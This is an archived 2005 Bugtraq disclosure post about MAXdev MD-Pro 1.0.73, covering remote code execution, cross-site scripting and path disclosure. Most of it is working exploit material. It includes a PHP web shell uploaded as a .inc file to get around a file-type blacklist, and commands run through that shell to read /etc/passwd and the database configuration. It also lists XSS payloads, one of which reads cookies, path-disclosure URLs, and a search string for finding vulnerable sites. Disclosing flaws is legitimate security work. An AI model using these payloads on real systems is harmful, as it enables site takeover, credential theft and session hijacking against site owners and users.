lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050906014413.28311.qmail@securityfocus.com>
Date: 6 Sep 2005 01:44:13 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code
 execution / cross site scripting / path disclosure


MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution
/ cross site scripting / path disclosure

software:
site: http://www.maxdev.com/
description: http://www.maxdev.com/AboutMD.phtml

1) remote code/commands execution:
after registration goto "Downloads" page and click on "Add a download"...
this is the message:

"You are not authorized to use any of the following filetypes for uploading:
  .swf  .jsp  .php  .php3  .php4  .phtml  .pl  .com  .bat  .exe"

geez, and what about .inc , .pwml and .php2 or something (use imagination..) ? ;)

type of files you can execute depends on server configuration
should be better to set which type of files a user CAN upload... :)

upload a file with .inc extension with this code inside:

<?php
error_reporting(0);
system($_GET[c]);
?>

now list directories with:

http://[target]/[path]/upload/dl/[filename].inc?c=ls%20-la

see /etc/passwd file:

http://[target]/[path]/upload/dl/[filename].inc?c=cat%20/etc/passwd

see database username and password:

http://[target]/[path]/upload/dl/[filename].inc?c=cat%20../.
/config/md-config.php


2) XSS:
http://[target]/[path]/modules.php?op=modload&name=subjects&file=print&print=<script>alert('LOL')</script>
http://[target]/[path]/modules.php?op=modload&name=Messages&file=bb_smilies&sitename=</title><script>alert(LOL')</script>
http://[target]/[path]/modules.php?op=modload&name=Messages&file=bbcode_ref&sitename=</title><script>alert(LOL')</script>
http://[target]/[path]/javascript/openwindow.php?hlpfile=")<html><script>alert(document.cookie)</script>

3) path disclosure:

http://[target]/[path]/modules/Wiki/pnblocks/wiki.php
http://[target]/[path]/modules/AutoTheme/
http://[target]/[path]/modules/Blocks/
http://[target]/[path]/modules/MySQL_Tools/admin.php
http://[target]/[path]/md/modules/Permissions/pnadmin.php
http://[target]/[path]/md/modules/Topics/

googledork: "Powered by MD-Pro" | "made with MD-Pro"

rgod
site: http://rgod.altervista.org
mail: retrogod@...ceposta.it

original advisory: http://rgod.altervista.org/maxdev1073.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ